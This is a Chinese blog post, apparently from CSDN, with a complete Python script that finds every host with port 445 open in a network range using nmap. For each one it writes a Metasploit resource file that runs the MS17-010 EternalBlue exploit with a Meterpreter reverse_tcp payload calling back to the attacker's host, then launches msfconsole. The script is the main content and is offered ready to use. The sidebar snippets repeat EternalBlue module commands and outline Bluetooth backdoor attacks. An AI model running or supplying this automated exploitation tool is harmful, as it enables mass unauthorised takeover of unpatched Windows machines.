Python脚本与Metasploit交互进行自动永恒之蓝攻击

最新推荐文章于 2024-07-14 17:22:12 发布
最新推荐文章于 2024-07-14 17:22:12 发布
阅读量4.8k 收藏 19
点赞数 4
分类专栏: Python实战案例
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36119192/article/details/83986928
版权

我们首先利用 findTarget() 函数找到目标网段或目标主机中开放了445端口的主机,然后利用 confickerExploit() 函数将攻击代码写入 configure.rc 配置文件中,最后调用 MSF 框架读取配置文件进行攻击!

# -*- coding: utf-8 -*-
"""
Created on Sun Nov  12 09:11:33 2018
@author: 小谢
"""
import os
import optparse
import sys
import nmap
def findTarget(Hosts):              #扫描网段范围内开放445端口的主机
    nmScan=nmap.PortScanner()
    nmScan.scan(Hosts,'445')
    targets=[]
    for t in nmScan.all_hosts():
        if nmScan[t].has_tcp(445):  #如果445端口提供了协议
            state=nmScan[t]['tcp'][445]['state']  #查看445端口的状态
            if state=='open':
                print '[+]Found Target Host:'+t
                targets.append(t) 
    return targets         #返回开放445端口的主机列表
def confickerExploit(configFile,target,lhost):       #漏洞利用
    configFile.write('use exploit/windows/smb/ms17_010_eternalblue \n')  #漏洞利用代码
    configFile.write('set PAYLOAD windows/x64/meterpreter/reverse_tcp\n')
    configFile.write('set RHOST '+str(target)+'\n')              #设定参数
    configFile.write('set LHOST '+lhost+'\n')
    configFile.write('exploit -j -z\n')    #j选项是将所有连接的会话保持在后台 -z不与任务进行即时交换
def main():
    configFile=open('configure.rc','w')  #以写入方式打开配置文件
    usage='[-]Usage %prog -H <RHOSTS> -l/-L <LHOST> '
    parser=optparse.OptionParser(usage)
    parser.add_option('-H',dest='target',type='string',help='target host')           #目标主机
    parser.add_option('-l','-L',dest='lhost',type='string',help='listen address')    #我们的主机
    (options,args)=parser.parse_args()
    target=options.target
    lhost=options.lhost
    if (target==None)|(lhost==None):
        print parser.usage
        exit(0)
    targets=findTarget(options.target)           #寻找目标
    for target in targets:                       #逐个攻击
        confickerExploit(configFile,target,lhost)
        configFile.close()
        os.system('msfconsole -r configure.rc')  #启动metasploit并读取配置文件
if __name__=='__main__':
    main()

谢公子
关注
  • 4
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
python调用msfconsole全自动永恒之蓝攻击_MSF框架实现“永恒之蓝”ms17-010的exp攻击...
weixin_39806779的博客
12-22 615
其实我们这里所说的使用MSF 实现 “永恒之蓝”的快速攻击,就是利用Metasploit中针对ms17-101漏洞的攻击载荷进行攻击获取主机控制权限。我这里简单的记录下整个攻击利用所需要的工具准备、利用过程以及后渗透的一些简单内容。本次用到的环境:kali系统.ip地址:192.168.1.106目标靶机为:win7sp1x64系统(关闭防火墙),ip地址:192.168.1.102具体的步骤如下...
蓝牙攻击-基础篇
abg49988的博客
11-20 5502
kali蓝牙攻击步骤: 目标手机开启了蓝牙,通过bluegranger连接手机,向目标手机发送后门程序,配合msf渗透手机 1.加载并扫描发现其他蓝牙设备:     hciconfig     hciconfig hci0 up     hcitool scan     fang -r 范围 -s  使用fang工具扫描隐藏的蓝牙设备(可以设置扫描范围)     f...
python开发的软件sparrow-黑客常用wifi蓝牙分析攻击工具,让你的设备陷入危险之中...
weixin_37988176的博客
11-01 326
工具概述Sparrow-wifi本质上一款针对下一代2.4GHz和5GHz的WiFi频谱感知工具,它不仅提供了GUI图形化用户界面,而且功能更加全面,可以代替类似inSSIDer和linssid之类的linux工具。在其最完整的使用场景下,Sparrow-wifi可以将WiFi、软件定义无线电(hackrf)、高级蓝牙工具、传统GPS(gpsd)和漫游GPS(mavlink)整合到一个解决方案之中...
通过Metasploit实现MS17-010(永恒之蓝漏洞)的复现学习
最新发布
Time_worm的博客
07-14 669
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
python调用msfconsole全自动永恒之蓝攻击_metasploit 下利用永恒之蓝攻击靶机win7
weixin_39874379的博客
12-22 272
实验环境:一台win7靶机,kali作为攻击机控制台下输入msfconsolesearch ms17-010use exploit/windows/smb/ms17_010_eternalblue接下来可以看一下受这个漏洞影响的操作系统可以看出受影响的有两个,分别是win7和server 2008 R2两种操作系统(ps:这两款靶机都可以自己搭建一下,我这里使用的是win7)show option...
Python脚本Metasploit交互攻击
谢公子的博客
11-08 5544
Metasploit是一款强大的漏洞扫描和利用工具,编写Python脚本Metasploit进行交互,可以自动化的扫描和利用漏洞。 相关文章:Metasploit框架的使用 在脚本中,我们首选需要利用 nmap 模块扫描目标主机是否开放了445端口,我们写了一个 findTarget() 函数,来扫描给定ip或者给定网段中开放了目标端口的主机,返回开放了445端口的主机列表。445端口是作为...
Python进行无线网络攻击
人生苦短, 还不用Python?
04-15 3524
本章大部分代码都是实现了但是缺乏相应的应用环境,想具体测试的可以直接找到对应的环境或者自行修改脚本以适应生活常用的环境。 搭建无线网络攻击环境 用Scapy测试无线网卡的嗅探功能: 插入无线网卡,输入iwconfig命令查看网卡信息: 将可能会影响进行无线实验的因素排除掉,然后将网卡设置为混杂模式: 确认进入Monitor模式: 测试嗅探无线网络的代码: #!/us...
meterpy:Meterpreter目标Python脚本
04-28
Meterpreter是一种高级的远程控制工具,它通常与Metasploit框架一起使用,为渗透测试者提供了丰富的交互式功能。在IT安全领域,Meterpreter被广泛用于合法的安全评估和漏洞利用,帮助安全专家模拟攻击者的行为,以...
Python-通过PUTHTTP方法自动化shell上传以获取meterpreter的脚本
08-10
接下来,我们需要编写一个Python脚本来执行PUT操作。下面是一个简单的示例: ```python import requests url = 'http://target_server.com/path/to/upload' # 目标服务器的URL payload = open('shell_script.sh', ...
漏洞盒子自动提交111.zip
11-13
例如,使用OWASP ZAP、Burp Suite等工具进行黑盒或白盒测试,或者利用Metasploit这样的框架进行攻击模拟。 然后,一旦漏洞被确认,脚本自动整理相关信息,包括受影响的系统、漏洞类型、影响程度、潜在的利用方式...
Python-impacketImpacket是个使用网络协议进行工作的工具集合
08-10
这个库提供了一系列的类和函数,使得开发者能够轻松地与各种网络协议进行交互,包括但不限于SMB(Server Message Block)、LDAP(Lightweight Directory Access Protocol)、Kerberos等。在网络安全、渗透测试和系统...
strust2漏洞批量检查利用python脚本
05-17
python2.7,暂不支持python3,需安装几个python模块。
Python-为该工具提供一个nessus文件它会自动为您提供MSFshell
08-10
这个Python工具的作用在于自动化这个过程:它解析.Nessus文件中的漏洞信息,寻找可能的攻击向量,然后生成相应的Metasploit模块或payload,通过MSFshell与目标系统建立连接。这样,安全研究员无需手动筛选和配置每个...
python调用msfconsole全自动永恒之蓝攻击_MSF之MS17-010永恒之蓝漏洞利用
weixin_36190719的博客
01-14 572
Loading...请注意,本文编写于 392 天前,最后修改于 116 天前,其中某些信息可能已经过时。# MSF之MS17-010永恒之蓝漏洞利用1. 准备阶段2. 扫描漏洞3. 漏洞攻击---## 准备阶段**实验准备环境:**攻击机:虚拟机kali系统IP:192.168.207.130被攻击机:虚拟机Win7x64系统IP:10.101.2.11(关闭了防火墙)攻击工具:kali自带Ms...
python调用metasploit自动攻击_Python-实现与metasploit交互并进行ms17_010攻击
weixin_36290287的博客
01-30 235
关于ms17_010,可参考http://www.cnblogs.com/sch01ar/p/7672454.html目标IP:192.168.220.139本机IP:192.168.220.145# -*- coding:utf-8 -*-__author__ = "MuT6 Sch01aR"import osdef Handler(configFile,lhost,lport,rhost):c...
蓝牙攻击
不忘初心,护天下安全!
11-13 5533
偶然的机会,在学校食堂打开了蓝牙,上百个蓝牙组成的列表惊到了我,于是进入蓝牙攻击的学习中。 因先要买一个蓝牙usb适配器,故先记录到这里,遇到了一篇比较好的博文: http://www.sohu.com/a/271945929_653604...
记录一次 先手工 再python脚本 验证永恒之蓝ms17-10漏洞
wh1te 小白的博客
10-19 4795
查看资料 ms17-10漏洞利用的步骤大致如下 打开msf use auxiliary/scanner/smb/smb_ms17_010 msf exploit(ms17_010_eternalblue) &gt; use exploit/windows/smb/ms17_010_eternalblue msf exploit(ms17_010_eternalblue) &gt; set ...
蓝牙地址的name为null_蓝牙真的安全吗?欺骗或克隆蓝牙设备,实现中间劫持,你知道吗?...
weixin_39737636的博客
11-21 776
用心做分享,只为给您最好的学习教程如果您觉得文章不错,欢迎持续学习蓝牙协议越来越普及,很多智能设备都在用蓝牙连接,甚至一些医疗设施设备,同样也如此,但是,你知道吗?蓝牙并不是绝对安全的,对于渗透人员来说,它甚至可以被高度模仿,直至访问一些敏感数据,如果你的手机蓝牙被控制了,你想得到,会有多大的安全隐患吗?今天我们以渗透测试的角度,来剖析蓝牙存在的安全隐患,文章旨在分享技术,切不可用于非法途径。Sp...
kail环境下msf框架攻击ms17-010(永恒之蓝)漏洞演示
weixin_46447549的博客
04-23 7291
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言前言实验目的实验环境实验步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 前言 MS17-010(永恒之蓝)是一种操作系统漏洞,他的爆发源于WannaCry勒索病毒的诞生。该病毒是不法分子利用NSA(National Secu.
msf永恒之蓝攻击win10
09-01
根据提供的引用内容,永恒之蓝是一种利用Windows系统的SMB协议漏洞来获取系统最高权限的攻击方式。然而,永恒之蓝攻击模块(`ms17_010_eternalblue`)并不直接支持对Windows 10系统的攻击永恒之蓝主要是针对Windows 7和Windows Server 2008 R2系统进行攻击的。 如果你想在Metasploit Framework中使用永恒之蓝攻击模块对Windows 10进行攻击,你需要使用另外一个模块,如`ms17_010_psexec`或`ms17_010_eternalromance`等。这些模块允许利用永恒之蓝漏洞攻击Windows 10系统。 请注意,进行任何形式的攻击都是非法的,除非你有合法的授权并且在合法和合规的环境中进行。我强烈建议遵守法律和道德准则,避免从事非法活动。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [经典利用永恒之蓝漏洞对Windows操作系统进行攻击](https://blog.csdn.net/qq_46202048/article/details/121535176)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

谢公子

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值